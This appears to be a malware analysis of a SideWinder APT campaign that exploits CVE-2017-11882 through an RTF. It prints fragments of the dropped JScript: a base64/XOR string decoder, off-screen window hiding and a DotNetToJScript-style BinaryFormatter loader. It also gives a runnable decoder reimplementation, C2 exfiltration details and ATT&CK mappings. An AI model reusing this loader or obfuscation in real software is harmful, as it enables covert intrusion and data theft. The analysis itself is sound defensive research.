<h6>The initial vector is an RTF file that uses a well-known vulnerability (CVE-2017-11882) to execute a JS script (1.a) from the OLE object package.</h6>
```javascript
// RDDb() is an inline base64 decoder, SJnEuQM(key, data) a repeating-key XOR
function EvpTXkLe(bsix){ return SJnEuQM(keeee, RDDb(bsix)); }
// the XOR key itself is stored base64-encoded and XOR-ed with the short key "YjfT"
var keeee = SJnEuQM("YjfT", RDDb("altWY2"+"hcV2xq"+"XA=="));
```
<h6>This series of functions performs the base64 decoding and the XOR with a constant, obfuscated key (keeee); the two steps can be merged into the single function below.</h6>
```javascript
function EvpTXkLe(bytes)
{
    // inline base64 decoder (expects padded input) followed by a repeating-key XOR
    var b, b64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=", result = "", r1, r2, i = 0, res = [], key = "3107161836";
    for (; i < bytes.length;)
    {
        b = b64.indexOf(bytes.charAt(i++)) << 18 | b64.indexOf(bytes.charAt(i++)) << 12 | (r1 = b64.indexOf(bytes.charAt(i++))) << 6 | (r2 = b64.indexOf(bytes.charAt(i++)));
        result += r1 === 64 ? String.fromCharCode(b >> 16) : r2 === 64 ? String.fromCharCode(b >> 16 & 255, b >> 8 & 255) : String.fromCharCode(b >> 16 & 255, b >> 8 & 255, b & 255);
    }
    // XOR pass; the original listing is cut off here, the repeating-key XOR matches how keeee is derived above
    for (i = 0; i < result.length; i++) res.push(String.fromCharCode(result.charCodeAt(i) ^ key.charCodeAt(i % key.length)));
    return res.join("");
}
```
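To check the deobfuscation, here is the two-stage decoder written out as plain functions, with the key derivation run on the constants taken from the script above. This is an added example, not code from the sample or from the original analysis; the function names (`b64Decode`, `xorKey`, `deriveKey`, `decryptString`, `encryptString`) and the round-trip input are our own, and `encryptString` uses Node's `Buffer` only to build test vectors.

```javascript
// Added example (not the sample's own code): the two obfuscation stages used by the
// dropped script as plain functions, so the constants on the page can be verified.
// RDDb() in the sample is the base64 decoder, SJnEuQM(key, data) the repeating-key XOR.
const B64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";

// Base64 -> "binary string" (one char per byte). Same algorithm as the sample's decoder,
// including its expectation of '='-padded input.
function b64Decode(s) {
  let out = "";
  for (let i = 0; i < s.length; ) {
    const c1 = B64.indexOf(s.charAt(i++)), c2 = B64.indexOf(s.charAt(i++));
    const c3 = B64.indexOf(s.charAt(i++)), c4 = B64.indexOf(s.charAt(i++));
    const b = (c1 << 18) | (c2 << 12) | (c3 << 6) | c4;
    if (c3 === 64) out += String.fromCharCode(b >> 16);                       // "xx=="
    else if (c4 === 64) out += String.fromCharCode((b >> 16) & 255, (b >> 8) & 255); // "xxx="
    else out += String.fromCharCode((b >> 16) & 255, (b >> 8) & 255, b & 255);
  }
  return out;
}

// Repeating-key XOR, key byte chosen by data index (second stage of the sample).
function xorKey(key, data) {
  let out = "";
  for (let i = 0; i < data.length; i++)
    out += String.fromCharCode(data.charCodeAt(i) ^ key.charCodeAt(i % key.length));
  return out;
}

// keeee as the sample builds it: the real key is stored base64-encoded and XOR-ed with "YjfT".
// Constants are the ones from the script; the result must equal the literal "3107161836"
// used by the merged decoder.
function deriveKey() {
  return xorKey("YjfT", b64Decode("altWY2" + "hcV2xq" + "XA=="));
}

// The merged decoder: base64, then XOR with the recovered constant key.
function decryptString(blob, key = deriveKey()) {
  return xorKey(key, b64Decode(blob));
}

// Inverse, used only to build constructed test vectors (Node's Buffer; not part of the sample).
function encryptString(plain, key = deriveKey()) {
  return Buffer.from(xorKey(key, plain), "latin1").toString("base64");
}

// Usage: recover the key and decode a constructed blob (not an artefact from the campaign).
const SAMPLE_BLOB = encryptString("Scripting.FileSystemObject");
console.log(deriveKey(), "->", decryptString(SAMPLE_BLOB));
```

Because the whole key material is carried inside the script, the scheme only hides strings from static scanning; a detection that keys on the decoder structure (the base64 alphabet literal next to a `charCodeAt(i) ^` loop and an `ActiveXObject` call) survives a change of the constant key, whereas one built on the decoded strings does not.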
<h6>The first block inside the try/catch initialises the window position off-screen and the payload to inject into the process.</h6>
```javascript
var mst = null;   // serialized .NET object, deserialized later by the BinaryFormatter
var FSO = null;   // Scripting.FileSystemObject, created later
// shrink the window and push it outside the visible display
window.resizeTo(1, 1);
window.moveTo(-1000, -1200);
var shells = new ActiveXObject("WScript.Shell");
var so = "..."; // base64 payload blob to inject into the process (omitted from this listing)
```
<h6>The next block holds two functions: one writes the payload to inject, the other checks the .NET version installed on the system.</h6>
<h6>The last block contains the legitimate (but abusable) software and a well-known loader used by SideWinder; it runs the version matching the installed .NET runtime through a DynamicInvoke call.</h6>
```javascript
ver = "v2.0.50727";
try
{
    FSO = new ActiveXObject("Scripting.FileSystemObject");
    // DotNetToJScript-style loader: BinaryFormatter and ArrayList are reachable through COM,
    // so a serialized .NET delegate (mst) can be deserialized and invoked from script
    var fmt = new ActiveXObject("System.Runtime.Serialization.Formatters.Binary.BinaryFormatter");
    var al = new ActiveXObject("System.Collections.ArrayList");
    var d = fmt["Deserialize_2"](mst);
    al.Add(undefined);
    // invoking the delegate loads the embedded assembly and returns an instance of StInstaller.Program
    var o = d["DynamicInvoke"](al.ToArray())["CreateInstance"]("StInstaller.Program");
    var x = "..."; // base64 blob: the legitimate executable (omitted from this listing)
    var y = "..."; // base64 blob: the loader (omitted from this listing)
    var m = o.Work;
    // remainder of the try block, and the catch/finally described below, omitted from this listing
```
<h6>Finally, if an exception is thrown it still executes the process with the loader and the code to inject (process injection), and it closes the window whatever the result.</h6>
###### We can note that ```202/KfzLXf6NisWqPtYOrrQYJfzErkCyS8ib8dz3QSsN/1115/2280/16331af8``` looks like an internal reference for the SideWinder group; it is used as an identifier in the communications with the C2 for the data sent. The path of the origin directory is encoded in base64.
<h6>The first piece of software is a legitimate Microsoft EFS REKEY wizard known as rekeywiz.exe. It can generate the certificates for EFS, which we can confirm from the software's code.</h6>
<h6>In the .NET loader, an instance is loaded from the code extracted by the module. This module XORs the bytes in a loop to obtain the payload to execute.</h6>
```csharp
        // tail of the decompiled loader class: a path and an offset into it (decompiler Token/RID comments kept)
        public long OffsetPosition { get { return this._offsetPosition; } }
        // Token: 0x04000024 RID: 36
        public readonly string _path;
        // Token: 0x04000025 RID: 37
        public readonly long _offsetPosition;
    }
}
}
```
<h6>The second module selects the correct extension rather than the content to push; it also uses a popular JSON framework for .NET (Newtonsoft). Once the files are done, it queues them to be sent to the C2 as zip files. The origin path, type and offset of the victim's files are pushed base64-encoded in the X-File references in the header. The JSON files are still stored in AppData, in a folder whose identifier name is ```CommonsDat``` instead of the ```AuthyDat``` used in the last operation against China (cf. the last analysis).</h6>
|Tactic|Technique|Reference|
|:---|:---|:---|
|Execution|Execution through Module Load<br>Exploitation for Client Execution|https://attack.mitre.org/techniques/T1129/<br>https://attack.mitre.org/techniques/T1203/|
|Persistence|Registry Run Keys / Startup Folder|https://attack.mitre.org/techniques/T1060/|
<h6>This can be exported in JSON format: <a href="https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Indian/APT/SideWinder/25-12-19/JSON/MITRE_ref.json">Export in JSON</a></h6>
<h2>Yara Rules<a name="Yara"></a></h2>
<h6>A list of YARA rules is available <a href="">here</a></h6>